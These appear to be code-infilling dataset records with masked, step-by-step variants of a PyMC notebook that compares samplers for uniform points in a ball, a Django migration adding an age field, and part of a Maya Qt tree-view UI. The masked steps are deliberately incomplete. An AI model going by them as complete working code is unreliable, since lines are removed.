ax3.acorr(tr[i].reshape(100), color='k')
else:
ax3a = fig.add_subplot(2, 4, 4 + 4 * i, sharex=ax3)
ax3a.acorr(tr[i].reshape(100), color='k')
pl.xlabel('Autocorrelation')
pl.xticks([-5, 0, 5])
pl.yticks([0.0, 0.5, 1])
pl.axis([-12, 12, -0.1, 1.1])
pl.text(-10, 1, '(%s)' % 'de'[i], fontsize=16, va='top', ha='left')
pl.setp(ax2.get_xticklabels(), visible=False)
pl.setp(ax3.get_xticklabels(), visible=False)
pl.subplots_adjust(wspace=0.55, hspace=0.1, bottom=0.14, left=0.13)
plot_trace(X, 1, 0.0)
pl.savefig('book/graphics/gibbs-ball.pdf')
mc.np.random.seed(123456789)
<|reserved_special_token_0|>
@mc.potential
def in_ball(X=X, s=3.0, t=pl.pi / 4.0):
if (pl.cos(t) * X[0] + pl.sin(t) * X[1]) ** 2 + s ** 2 * (pl.cos(t) * X
[1] - pl.sin(t) * X[0]) ** 2 <= 1.0:
return 0
else:
return -pl.inf
<|reserved_special_token_0|>
m.sample(100, progress_bar=False)
plot_trace(X, 3, pl.pi / 4)
pl.savefig('book/graphics/metropolis-ball.pdf')
mc.np.random.seed(1234567)
<|reserved_special_token_0|>
@mc.potential
def in_ball(X=X, s=3.0, t=pl.pi / 4):
if (pl.cos(t) * X[0] + pl.sin(t) * X[1]) ** 2 + s ** 2 * (pl.cos(t) * X
[1] - pl.sin(t) * X[0]) ** 2 <= 1.0:
return 0
else:
return -pl.inf
<|reserved_special_token_0|>
m.use_step_method(mc.AdaptiveMetropolis, X)
m.sample(100, progress_bar=False)
plot_trace(X, 3, pl.pi / 4)
pl.savefig('book/graphics/am-ball-1.pdf')
m.sample(iter=20100, burn=20000, progress_bar=False)
plot_trace(X, 3, pl.pi / 4)
pl.savefig('book/graphics/am-ball-2.pdf')
pl.show()
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <codecell>
import pylab as pl
import pymc as mc
import book_graphics
reload(book_graphics)
# <markdowncell>
# Uniform points in an $n$-dimensional ball
# =========================================
#
# This notebook implements and compares samplers in PyMC
# to sample uniformly from an $n$-dimensional ball,
# i.e to sample from the set
# $$
# \mathbf{B}_n = \\{x \in \mathbf{R}^n: \|x\|\leq 1\\}
# $$
# <codecell>
mc.np.random.seed(1234567)
# simple model
n = 2
X = [mc.Uninformative('X_%d'%i, value=0) for i in range(n)]
@mc.potential
def in_ball(X=X):
if X[0]**2 + X[1]**2 <= 1.:
return 0
else:
return -pl.inf
# <codecell>
class UniformBall(mc.Gibbs):
def __init__(self, stochastic, others, verbose=None):
self.others = others
self.conjugate = True # pymc will include a Metropolis rejection step on top of the proposal if this is false
mc.Gibbs.__init__(self, stochastic, verbose)
def propose(self):
x_other = [X_i.value for X_i in self.others]
max_val = pl.sqrt(1. - pl.dot(x_other, x_other))
self.stochastic.value = mc.runiform(-max_val, max_val)
# <codecell>
m = mc.MCMC([X, in_ball])
for i in range(n):
m.use_step_method(UniformBall, X[i], [X[j] for j in range(n) if j != i])
# <codecell>
m.sample(100, progress_bar=False)
# <codecell>
def plot_trace(X, scale=1., angle=0.):
fig = pl.figure(figsize=(12,4.75))
ax1 = fig.add_subplot(1, 2, 1)
# plot boundary
t = pl.arange(0,2*pl.pi,.01)
ax1.plot(pl.cos(angle)*pl.cos(t) - pl.sin(angle)*pl.sin(t)/scale, pl.cos(angle)*pl.sin(t)/scale + pl.sin(angle)*pl.cos(t), 'k:')
# plot samples
if isinstance(X, mc.Stochastic):
tr = [X.trace()[:,0], X.trace()[:,1]]
else:
tr = [X[0].trace(), X[1].trace()]
ax1.plot(tr[0], tr[1], 'ko-')
# decorate plot
book_graphics.set_font()
pl.xlabel('$X_1$')
pl.ylabel('$X_2$', rotation=0)
pl.axis([-1.1,1.1,-1.1,1.1])
pl.text(-1,1,'(a)', fontsize=16, va='top', ha='left')
for i in range(2):
if i == 0:
ax2 = fig.add_subplot(2, 4, 3+4*i)
ax2.plot(tr[i], 'k', drawstyle='steps-mid')
else:
ax2a = fig.add_subplot(2, 4, 3+4*i, sharex=ax2)
ax2a.plot(tr[i], 'k', drawstyle='steps-mid')
pl.xlabel('Sample')
pl.xticks([25,50,75])
pl.yticks([-.5,0,.5])
pl.ylabel('$X_%d$'%(i+1), rotation=0)
pl.axis([-5,105,-1.5,1.5])
pl.text(-1,1.25,'(%s)'%'bc'[i], fontsize=16, va='top', ha='left')
if i == 0:
ax3 = fig.add_subplot(2, 4, 4+4*i)
ax3.acorr(tr[i].reshape(100), color='k')
else:
ax3a = fig.add_subplot(2, 4, 4+4*i, sharex=ax3)
ax3a.acorr(tr[i].reshape(100), color='k')
pl.xlabel('Autocorrelation')
pl.xticks([-5,0,5])
pl.yticks([0., .5, 1])
pl.axis([-12,12,-.1,1.1])
pl.text(-10,1,'(%s)'%'de'[i], fontsize=16, va='top', ha='left')
pl.setp(ax2.get_xticklabels(), visible=False)
pl.setp(ax3.get_xticklabels(), visible=False)
pl.subplots_adjust(wspace=.55, hspace=.1, bottom=.14,left=.13)
# <codecell>
plot_trace(X, 1, 0.)
pl.savefig('book/graphics/gibbs-ball.pdf')
# <markdowncell>
# Now with the Metropolis sampler
# ---------------------------------
# <codecell>
mc.np.random.seed(123456789)
# <codecell>
# simple model
n = 2
X = mc.Uninformative('X', value=[0,0])
@mc.potential
def in_ball(X=X, s=3., t=pl.pi/4.):
if (pl.cos(t)*X[0] + pl.sin(t)*X[1])**2 + s**2*(pl.cos(t)*X[1] -pl.sin(t)*X[0])**2 <= 1.:
return 0
else:
return -pl.inf
m = mc.MCMC([X, in_ball])
m.sample(100, progress_bar=False)
# <codecell>
plot_trace(X, 3, pl.pi/4)
pl.savefig('book/graphics/metropolis-ball.pdf')
# <markdowncell>
# Now with Adaptive Metropolis
# <codecell>
mc.np.random.seed(1234567)
# simple model
n = 2
X = mc.Uninformative('X', value=[0,0])
@mc.potential
def in_ball(X=X, s=3., t=pl.pi/4):
if (pl.cos(t)*X[0] + pl.sin(t)*X[1])**2 + s**2*(pl.cos(t)*X[1] -pl.sin(t)*X[0])**2 <= 1.:
return 0
else:
return -pl.inf
m = mc.MCMC([X, in_ball])
m.use_step_method(mc.AdaptiveMetropolis, X)
# <codecell>
m.sample(100, progress_bar=False)
plot_trace(X, 3, pl.pi/4)
pl.savefig('book/graphics/am-ball-1.pdf')
# <codecell>
m.sample(iter=20100, burn=20000, progress_bar=False)
plot_trace(X, 3, pl.pi/4)
pl.savefig('book/graphics/am-ball-2.pdf')
pl.show()
|
flexible
|
{
"blob_id": "8283bdab023e22bba3d8a05f8bda0014ee19adee",
"index": 4286,
"step-1": "<mask token>\n\n\nclass UniformBall(mc.Gibbs):\n\n def __init__(self, stochastic, others, verbose=None):\n self.others = others\n self.conjugate = True\n mc.Gibbs.__init__(self, stochastic, verbose)\n\n def propose(self):\n x_other = [X_i.value for X_i in self.others]\n max_val = pl.sqrt(1.0 - pl.dot(x_other, x_other))\n self.stochastic.value = mc.runiform(-max_val, max_val)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]\ndef in_ball(X=X):\n if X[0] ** 2 + X[1] ** 2 <= 1.0:\n return 0\n else:\n return -pl.inf\n\n\nclass UniformBall(mc.Gibbs):\n\n def __init__(self, stochastic, others, verbose=None):\n self.others = others\n self.conjugate = True\n mc.Gibbs.__init__(self, stochastic, verbose)\n\n def propose(self):\n x_other = [X_i.value for X_i in self.others]\n max_val = pl.sqrt(1.0 - pl.dot(x_other, x_other))\n self.stochastic.value = mc.runiform(-max_val, max_val)\n\n\n<mask token>\n\n\ndef plot_trace(X, scale=1.0, angle=0.0):\n fig = pl.figure(figsize=(12, 4.75))\n ax1 = fig.add_subplot(1, 2, 1)\n t = pl.arange(0, 2 * pl.pi, 0.01)\n ax1.plot(pl.cos(angle) * pl.cos(t) - pl.sin(angle) * pl.sin(t) / scale,\n pl.cos(angle) * pl.sin(t) / scale + pl.sin(angle) * pl.cos(t), 'k:')\n if isinstance(X, mc.Stochastic):\n tr = [X.trace()[:, 0], X.trace()[:, 1]]\n else:\n tr = [X[0].trace(), X[1].trace()]\n ax1.plot(tr[0], tr[1], 'ko-')\n book_graphics.set_font()\n pl.xlabel('$X_1$')\n pl.ylabel('$X_2$', rotation=0)\n pl.axis([-1.1, 1.1, -1.1, 1.1])\n pl.text(-1, 1, '(a)', fontsize=16, va='top', ha='left')\n for i in range(2):\n if i == 0:\n ax2 = fig.add_subplot(2, 4, 3 + 4 * i)\n ax2.plot(tr[i], 'k', drawstyle='steps-mid')\n else:\n ax2a = fig.add_subplot(2, 4, 3 + 4 * i, sharex=ax2)\n ax2a.plot(tr[i], 'k', drawstyle='steps-mid')\n pl.xlabel('Sample')\n pl.xticks([25, 50, 75])\n pl.yticks([-0.5, 0, 0.5])\n pl.ylabel('$X_%d$' % (i + 1), rotation=0)\n pl.axis([-5, 105, -1.5, 1.5])\n pl.text(-1, 1.25, '(%s)' % 'bc'[i], fontsize=16, va='top', ha='left')\n if i == 0:\n ax3 = fig.add_subplot(2, 4, 4 + 4 * i)\n ax3.acorr(tr[i].reshape(100), color='k')\n else:\n ax3a = fig.add_subplot(2, 4, 4 + 4 * i, sharex=ax3)\n ax3a.acorr(tr[i].reshape(100), color='k')\n pl.xlabel('Autocorrelation')\n pl.xticks([-5, 0, 5])\n pl.yticks([0.0, 0.5, 1])\n pl.axis([-12, 12, -0.1, 1.1])\n pl.text(-10, 1, '(%s)' % 'de'[i], fontsize=16, va='top', ha='left')\n pl.setp(ax2.get_xticklabels(), visible=False)\n pl.setp(ax3.get_xticklabels(), visible=False)\n pl.subplots_adjust(wspace=0.55, hspace=0.1, bottom=0.14, left=0.13)\n\n\n<mask token>\n\n\[email protected]\ndef in_ball(X=X, s=3.0, t=pl.pi / 4.0):\n if (pl.cos(t) * X[0] + pl.sin(t) * X[1]) ** 2 + s ** 2 * (pl.cos(t) * X\n [1] - pl.sin(t) * X[0]) ** 2 <= 1.0:\n return 0\n else:\n return -pl.inf\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\[email protected]\ndef in_ball(X=X):\n if X[0] ** 2 + X[1] ** 2 <= 1.0:\n return 0\n else:\n return -pl.inf\n\n\nclass UniformBall(mc.Gibbs):\n\n def __init__(self, stochastic, others, verbose=None):\n self.others = others\n self.conjugate = True\n mc.Gibbs.__init__(self, stochastic, verbose)\n\n def propose(self):\n x_other = [X_i.value for X_i in self.others]\n max_val = pl.sqrt(1.0 - pl.dot(x_other, x_other))\n self.stochastic.value = mc.runiform(-max_val, max_val)\n\n\n<mask token>\n\n\ndef plot_trace(X, scale=1.0, angle=0.0):\n fig = pl.figure(figsize=(12, 4.75))\n ax1 = fig.add_subplot(1, 2, 1)\n t = pl.arange(0, 2 * pl.pi, 0.01)\n ax1.plot(pl.cos(angle) * pl.cos(t) - pl.sin(angle) * pl.sin(t) / scale,\n pl.cos(angle) * pl.sin(t) / scale + pl.sin(angle) * pl.cos(t), 'k:')\n if isinstance(X, mc.Stochastic):\n tr = [X.trace()[:, 0], X.trace()[:, 1]]\n else:\n tr = [X[0].trace(), X[1].trace()]\n ax1.plot(tr[0], tr[1], 'ko-')\n book_graphics.set_font()\n pl.xlabel('$X_1$')\n pl.ylabel('$X_2$', rotation=0)\n pl.axis([-1.1, 1.1, -1.1, 1.1])\n pl.text(-1, 1, '(a)', fontsize=16, va='top', ha='left')\n for i in range(2):\n if i == 0:\n ax2 = fig.add_subplot(2, 4, 3 + 4 * i)\n ax2.plot(tr[i], 'k', drawstyle='steps-mid')\n else:\n ax2a = fig.add_subplot(2, 4, 3 + 4 * i, sharex=ax2)\n ax2a.plot(tr[i], 'k', drawstyle='steps-mid')\n pl.xlabel('Sample')\n pl.xticks([25, 50, 75])\n pl.yticks([-0.5, 0, 0.5])\n pl.ylabel('$X_%d$' % (i + 1), rotation=0)\n pl.axis([-5, 105, -1.5, 1.5])\n pl.text(-1, 1.25, '(%s)' % 'bc'[i], fontsize=16, va='top', ha='left')\n if i == 0:\n ax3 = fig.add_subplot(2, 4, 4 + 4 * i)\n ax3.acorr(tr[i].reshape(100), color='k')\n else:\n ax3a = fig.add_subplot(2, 4, 4 + 4 * i, sharex=ax3)\n ax3a.acorr(tr[i].reshape(100), color='k')\n pl.xlabel('Autocorrelation')\n pl.xticks([-5, 0, 5])\n pl.yticks([0.0, 0.5, 1])\n pl.axis([-12, 12, -0.1, 1.1])\n pl.text(-10, 1, '(%s)' % 'de'[i], fontsize=16, va='top', ha='left')\n pl.setp(ax2.get_xticklabels(), visible=False)\n pl.setp(ax3.get_xticklabels(), visible=False)\n pl.subplots_adjust(wspace=0.55, hspace=0.1, bottom=0.14, left=0.13)\n\n\n<mask token>\n\n\[email protected]\ndef in_ball(X=X, s=3.0, t=pl.pi / 4.0):\n if (pl.cos(t) * X[0] + pl.sin(t) * X[1]) ** 2 + s ** 2 * (pl.cos(t) * X\n [1] - pl.sin(t) * X[0]) ** 2 <= 1.0:\n return 0\n else:\n return -pl.inf\n\n\n<mask token>\n\n\[email protected]\ndef in_ball(X=X, s=3.0, t=pl.pi / 4):\n if (pl.cos(t) * X[0] + pl.sin(t) * X[1]) ** 2 + s ** 2 * (pl.cos(t) * X\n [1] - pl.sin(t) * X[0]) ** 2 <= 1.0:\n return 0\n else:\n return -pl.inf\n\n\n<mask token>\n",
"step-4": "<mask token>\nreload(book_graphics)\nmc.np.random.seed(1234567)\n<mask token>\n\n\[email protected]\ndef in_ball(X=X):\n if X[0] ** 2 + X[1] ** 2 <= 1.0:\n return 0\n else:\n return -pl.inf\n\n\nclass UniformBall(mc.Gibbs):\n\n def __init__(self, stochastic, others, verbose=None):\n self.others = others\n self.conjugate = True\n mc.Gibbs.__init__(self, stochastic, verbose)\n\n def propose(self):\n x_other = [X_i.value for X_i in self.others]\n max_val = pl.sqrt(1.0 - pl.dot(x_other, x_other))\n self.stochastic.value = mc.runiform(-max_val, max_val)\n\n\n<mask token>\nfor i in range(n):\n m.use_step_method(UniformBall, X[i], [X[j] for j in range(n) if j != i])\nm.sample(100, progress_bar=False)\n\n\ndef plot_trace(X, scale=1.0, angle=0.0):\n fig = pl.figure(figsize=(12, 4.75))\n ax1 = fig.add_subplot(1, 2, 1)\n t = pl.arange(0, 2 * pl.pi, 0.01)\n ax1.plot(pl.cos(angle) * pl.cos(t) - pl.sin(angle) * pl.sin(t) / scale,\n pl.cos(angle) * pl.sin(t) / scale + pl.sin(angle) * pl.cos(t), 'k:')\n if isinstance(X, mc.Stochastic):\n tr = [X.trace()[:, 0], X.trace()[:, 1]]\n else:\n tr = [X[0].trace(), X[1].trace()]\n ax1.plot(tr[0], tr[1], 'ko-')\n book_graphics.set_font()\n pl.xlabel('$X_1$')\n pl.ylabel('$X_2$', rotation=0)\n pl.axis([-1.1, 1.1, -1.1, 1.1])\n pl.text(-1, 1, '(a)', fontsize=16, va='top', ha='left')\n for i in range(2):\n if i == 0:\n ax2 = fig.add_subplot(2, 4, 3 + 4 * i)\n ax2.plot(tr[i], 'k', drawstyle='steps-mid')\n else:\n ax2a = fig.add_subplot(2, 4, 3 + 4 * i, sharex=ax2)\n ax2a.plot(tr[i], 'k', drawstyle='steps-mid')\n pl.xlabel('Sample')\n pl.xticks([25, 50, 75])\n pl.yticks([-0.5, 0, 0.5])\n pl.ylabel('$X_%d$' % (i + 1), rotation=0)\n pl.axis([-5, 105, -1.5, 1.5])\n pl.text(-1, 1.25, '(%s)' % 'bc'[i], fontsize=16, va='top', ha='left')\n if i == 0:\n ax3 = fig.add_subplot(2, 4, 4 + 4 * i)\n ax3.acorr(tr[i].reshape(100), color='k')\n else:\n ax3a = fig.add_subplot(2, 4, 4 + 4 * i, sharex=ax3)\n ax3a.acorr(tr[i].reshape(100), color='k')\n pl.xlabel('Autocorrelation')\n pl.xticks([-5, 0, 5])\n pl.yticks([0.0, 0.5, 1])\n pl.axis([-12, 12, -0.1, 1.1])\n pl.text(-10, 1, '(%s)' % 'de'[i], fontsize=16, va='top', ha='left')\n pl.setp(ax2.get_xticklabels(), visible=False)\n pl.setp(ax3.get_xticklabels(), visible=False)\n pl.subplots_adjust(wspace=0.55, hspace=0.1, bottom=0.14, left=0.13)\n\n\nplot_trace(X, 1, 0.0)\npl.savefig('book/graphics/gibbs-ball.pdf')\nmc.np.random.seed(123456789)\n<mask token>\n\n\[email protected]\ndef in_ball(X=X, s=3.0, t=pl.pi / 4.0):\n if (pl.cos(t) * X[0] + pl.sin(t) * X[1]) ** 2 + s ** 2 * (pl.cos(t) * X\n [1] - pl.sin(t) * X[0]) ** 2 <= 1.0:\n return 0\n else:\n return -pl.inf\n\n\n<mask token>\nm.sample(100, progress_bar=False)\nplot_trace(X, 3, pl.pi / 4)\npl.savefig('book/graphics/metropolis-ball.pdf')\nmc.np.random.seed(1234567)\n<mask token>\n\n\[email protected]\ndef in_ball(X=X, s=3.0, t=pl.pi / 4):\n if (pl.cos(t) * X[0] + pl.sin(t) * X[1]) ** 2 + s ** 2 * (pl.cos(t) * X\n [1] - pl.sin(t) * X[0]) ** 2 <= 1.0:\n return 0\n else:\n return -pl.inf\n\n\n<mask token>\nm.use_step_method(mc.AdaptiveMetropolis, X)\nm.sample(100, progress_bar=False)\nplot_trace(X, 3, pl.pi / 4)\npl.savefig('book/graphics/am-ball-1.pdf')\nm.sample(iter=20100, burn=20000, progress_bar=False)\nplot_trace(X, 3, pl.pi / 4)\npl.savefig('book/graphics/am-ball-2.pdf')\npl.show()\n",
"step-5": "# -*- coding: utf-8 -*-\r\n# <nbformat>3.0</nbformat>\r\n\r\n# <codecell>\r\n\r\nimport pylab as pl\r\nimport pymc as mc\r\nimport book_graphics\r\nreload(book_graphics)\r\n\r\n# <markdowncell>\r\n\r\n# Uniform points in an $n$-dimensional ball\r\n# =========================================\r\n# \r\n# This notebook implements and compares samplers in PyMC\r\n# to sample uniformly from an $n$-dimensional ball,\r\n# i.e to sample from the set\r\n# $$\r\n# \\mathbf{B}_n = \\\\{x \\in \\mathbf{R}^n: \\|x\\|\\leq 1\\\\}\r\n# $$\r\n\r\n# <codecell>\r\n\r\nmc.np.random.seed(1234567)\r\n\r\n# simple model\r\nn = 2\r\nX = [mc.Uninformative('X_%d'%i, value=0) for i in range(n)]\r\[email protected]\r\ndef in_ball(X=X):\r\n if X[0]**2 + X[1]**2 <= 1.:\r\n return 0\r\n else:\r\n return -pl.inf\r\n\r\n# <codecell>\r\n\r\nclass UniformBall(mc.Gibbs):\r\n def __init__(self, stochastic, others, verbose=None):\r\n self.others = others\r\n self.conjugate = True # pymc will include a Metropolis rejection step on top of the proposal if this is false\r\n mc.Gibbs.__init__(self, stochastic, verbose)\r\n \r\n def propose(self):\r\n x_other = [X_i.value for X_i in self.others]\r\n max_val = pl.sqrt(1. - pl.dot(x_other, x_other))\r\n self.stochastic.value = mc.runiform(-max_val, max_val)\r\n\r\n# <codecell>\r\n\r\nm = mc.MCMC([X, in_ball])\r\nfor i in range(n):\r\n m.use_step_method(UniformBall, X[i], [X[j] for j in range(n) if j != i])\r\n\r\n# <codecell>\r\n\r\nm.sample(100, progress_bar=False)\r\n\r\n# <codecell>\r\n\r\ndef plot_trace(X, scale=1., angle=0.):\r\n fig = pl.figure(figsize=(12,4.75))\r\n \r\n ax1 = fig.add_subplot(1, 2, 1)\r\n # plot boundary\r\n t = pl.arange(0,2*pl.pi,.01)\r\n ax1.plot(pl.cos(angle)*pl.cos(t) - pl.sin(angle)*pl.sin(t)/scale, pl.cos(angle)*pl.sin(t)/scale + pl.sin(angle)*pl.cos(t), 'k:')\r\n \r\n # plot samples\r\n if isinstance(X, mc.Stochastic):\r\n tr = [X.trace()[:,0], X.trace()[:,1]]\r\n else:\r\n tr = [X[0].trace(), X[1].trace()]\r\n\r\n ax1.plot(tr[0], tr[1], 'ko-')\r\n \r\n # decorate plot\r\n book_graphics.set_font()\r\n pl.xlabel('$X_1$')\r\n pl.ylabel('$X_2$', rotation=0)\r\n pl.axis([-1.1,1.1,-1.1,1.1])\r\n pl.text(-1,1,'(a)', fontsize=16, va='top', ha='left')\r\n\r\n \r\n for i in range(2):\r\n if i == 0:\r\n ax2 = fig.add_subplot(2, 4, 3+4*i)\r\n ax2.plot(tr[i], 'k', drawstyle='steps-mid')\r\n else:\r\n ax2a = fig.add_subplot(2, 4, 3+4*i, sharex=ax2)\r\n ax2a.plot(tr[i], 'k', drawstyle='steps-mid')\r\n pl.xlabel('Sample')\r\n \r\n pl.xticks([25,50,75])\r\n pl.yticks([-.5,0,.5])\r\n pl.ylabel('$X_%d$'%(i+1), rotation=0)\r\n pl.axis([-5,105,-1.5,1.5])\r\n pl.text(-1,1.25,'(%s)'%'bc'[i], fontsize=16, va='top', ha='left')\r\n \r\n if i == 0:\r\n ax3 = fig.add_subplot(2, 4, 4+4*i)\r\n ax3.acorr(tr[i].reshape(100), color='k')\r\n else:\r\n ax3a = fig.add_subplot(2, 4, 4+4*i, sharex=ax3)\r\n ax3a.acorr(tr[i].reshape(100), color='k')\r\n pl.xlabel('Autocorrelation')\r\n \r\n pl.xticks([-5,0,5])\r\n pl.yticks([0., .5, 1])\r\n pl.axis([-12,12,-.1,1.1])\r\n pl.text(-10,1,'(%s)'%'de'[i], fontsize=16, va='top', ha='left')\r\n \r\n pl.setp(ax2.get_xticklabels(), visible=False)\r\n pl.setp(ax3.get_xticklabels(), visible=False)\r\n pl.subplots_adjust(wspace=.55, hspace=.1, bottom=.14,left=.13)\r\n\r\n# <codecell>\r\n\r\nplot_trace(X, 1, 0.)\r\npl.savefig('book/graphics/gibbs-ball.pdf')\r\n\r\n# <markdowncell>\r\n\r\n# Now with the Metropolis sampler\r\n# ---------------------------------\r\n\r\n# <codecell>\r\n\r\nmc.np.random.seed(123456789)\r\n\r\n# <codecell>\r\n\r\n# simple model\r\n\r\nn = 2\r\nX = mc.Uninformative('X', value=[0,0])\r\[email protected]\r\ndef in_ball(X=X, s=3., t=pl.pi/4.):\r\n if (pl.cos(t)*X[0] + pl.sin(t)*X[1])**2 + s**2*(pl.cos(t)*X[1] -pl.sin(t)*X[0])**2 <= 1.:\r\n return 0\r\n else:\r\n return -pl.inf\r\n \r\nm = mc.MCMC([X, in_ball])\r\n\r\nm.sample(100, progress_bar=False)\r\n\r\n# <codecell>\r\n\r\nplot_trace(X, 3, pl.pi/4)\r\npl.savefig('book/graphics/metropolis-ball.pdf')\r\n\r\n# <markdowncell>\r\n\r\n# Now with Adaptive Metropolis\r\n\r\n# <codecell>\r\n\r\nmc.np.random.seed(1234567)\r\n\r\n# simple model\r\nn = 2\r\nX = mc.Uninformative('X', value=[0,0])\r\[email protected]\r\ndef in_ball(X=X, s=3., t=pl.pi/4):\r\n if (pl.cos(t)*X[0] + pl.sin(t)*X[1])**2 + s**2*(pl.cos(t)*X[1] -pl.sin(t)*X[0])**2 <= 1.:\r\n return 0\r\n else:\r\n return -pl.inf\r\n \r\nm = mc.MCMC([X, in_ball])\r\nm.use_step_method(mc.AdaptiveMetropolis, X)\r\n\r\n# <codecell>\r\n\r\nm.sample(100, progress_bar=False)\r\n\r\nplot_trace(X, 3, pl.pi/4)\r\npl.savefig('book/graphics/am-ball-1.pdf')\r\n\r\n# <codecell>\r\n\r\nm.sample(iter=20100, burn=20000, progress_bar=False)\r\n\r\nplot_trace(X, 3, pl.pi/4)\r\npl.savefig('book/graphics/am-ball-2.pdf')\r\n\r\npl.show()\r\n\r\n\r\n",
"step-ids": [
3,
6,
7,
8,
11
]
}
|
[
3,
6,
7,
8,
11
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('productores', '0002_auto_20170327_0841')]
operations = [migrations.AddField(model_name='productor', name='edad',
field=models.IntegerField(choices=[(1, 'Menor 35'), (2, 'Mayor 35')
], default=1, editable=False), preserve_default=False)]
<|reserved_special_token_1|>
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [('productores', '0002_auto_20170327_0841')]
operations = [migrations.AddField(model_name='productor', name='edad',
field=models.IntegerField(choices=[(1, 'Menor 35'), (2, 'Mayor 35')
], default=1, editable=False), preserve_default=False)]
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-04-03 14:45
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('productores', '0002_auto_20170327_0841'),
]
operations = [
migrations.AddField(
model_name='productor',
name='edad',
field=models.IntegerField(choices=[(1, 'Menor 35'), (2, 'Mayor 35')], default=1, editable=False),
preserve_default=False,
),
]
|
flexible
|
{
"blob_id": "2f7be68f08716d5d04d064d81eecb53eb9b80174",
"index": 7635,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('productores', '0002_auto_20170327_0841')]\n operations = [migrations.AddField(model_name='productor', name='edad',\n field=models.IntegerField(choices=[(1, 'Menor 35'), (2, 'Mayor 35')\n ], default=1, editable=False), preserve_default=False)]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('productores', '0002_auto_20170327_0841')]\n operations = [migrations.AddField(model_name='productor', name='edad',\n field=models.IntegerField(choices=[(1, 'Menor 35'), (2, 'Mayor 35')\n ], default=1, editable=False), preserve_default=False)]\n",
"step-5": "# -*- coding: utf-8 -*-\n# Generated by Django 1.10.6 on 2017-04-03 14:45\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('productores', '0002_auto_20170327_0841'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='productor',\n name='edad',\n field=models.IntegerField(choices=[(1, 'Menor 35'), (2, 'Mayor 35')], default=1, editable=False),\n preserve_default=False,\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class MultiSkin_UI(MayaQWidgetDockableMixin, QtWidgets.QDialog):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def widgetsAndLayouts(self):
def addLine():
line = QtWidgets.QFrame()
line.setFrameShape(QtWidgets.QFrame.HLine)
return line
def addText(message, alignement=QtCore.Qt.AlignCenter, height=30,
bold=False):
myFont = QtGui.QFont()
myFont.setBold(bold)
text = QtWidgets.QLabel(message)
text.setAlignment(alignement)
text.setFixedHeight(height)
text.setFont(myFont)
return text
self.vLayoutAndFunctions = [['treeWidget', [1, 1, 1, 1]]]
self.vlayout = {}
for layoutName, margins in self.vLayoutAndFunctions:
self.vlayout[layoutName] = QtWidgets.QVBoxLayout()
self.vlayout[layoutName].setContentsMargins(margins[0], margins
[1], margins[2], margins[3])
self.hLayoutAndFunctions = [['filterOptions', [1, 1, 1, 1]], [
'buttonsOptions', [1, 1, 1, 1]], ['searchBarWidget', [1, 1, 1, 1]]]
self.hlayout = {}
for layoutName, margins in self.hLayoutAndFunctions:
self.hlayout[layoutName] = QtWidgets.QHBoxLayout()
self.hlayout[layoutName].setContentsMargins(margins[0], margins
[1], margins[2], margins[3])
self.searchBar = QtWidgets.QLineEdit()
self.searchBar.setPlaceholderText('Search...')
self.searchBar.textEdited.connect(self.searchBarEdited)
self.hlayout['searchBarWidget'].addWidget(self.searchBar)
self.matchCaseChx = QtWidgets.QCheckBox()
self.matchCaseChx.setChecked(False)
self.matchCaseChx.setText('Match Case')
self.matchCaseChx.stateChanged.connect(self.searchBarEdited)
self.allFilter = QtWidgets.QRadioButton('All', self)
self.allFilter.setChecked(True)
self.allFilter.toggled.connect(self.refreshQtree)
self.skinClusterFilter = QtWidgets.QRadioButton('Skin Clusters', self)
self.skinClusterFilter.setChecked(True)
self.skinClusterFilter.toggled.connect(self.refreshQtree)
self.meshTreeWidget = QtWidgets.QTreeWidget()
self.meshTreeWidget.setHeaderLabel('Cloth Tree View')
self.meshTreeWidget.setSelectionMode(self.meshTreeWidget.
ExtendedSelection)
self.vlayout['treeWidget'].addWidget(self.meshTreeWidget)
header = QtWidgets.QTreeWidgetItem(['Geometries'])
self.meshTreeWidget.setHeaderItem(header)
self.meshTreeWidget.itemClicked.connect(self.singleClickedAction)
self.meshTreeWidget.itemSelectionChanged.connect(self.
singleClickedAction)
self.refreshQtree()
def create_Button(self):
""" Create the buttons """
self.buttonAndFunctions = [['Show Selected', self.showSelected, 0,
pyQtDic['colorLightGrey'], '', self.hlayout['searchBarWidget'],
'', 30], ['Refresh', self.refreshQtree, 0, pyQtDic[
'colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],
['Clear', self.meshTreeWidget.clear, 0, pyQtDic[
'colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],
['Expand All', self.expandTree, 0, pyQtDic['colorLightGrey'],
'', self.hlayout['buttonsOptions'], '', 30], ['Close All', self
.closeTree, 0, pyQtDic['colorLightGrey'], '', self.hlayout[
'buttonsOptions'], '', 30]]
self.buttons = {}
for buttonName, buttonFunction, _, labColor, bgColor, layout, layout_coord, width in self.buttonAndFunctions:
self.buttons[buttonName] = adbRC.CustomQPushButton(buttonName)
self.buttons[buttonName].clicked.connect(buttonFunction)
try:
layout.addWidget(self.buttons[buttonName], int(layout_coord
.split(',')[0]), int(layout_coord.split(',')[1]))
except ValueError:
layout.addWidget(self.buttons[buttonName])
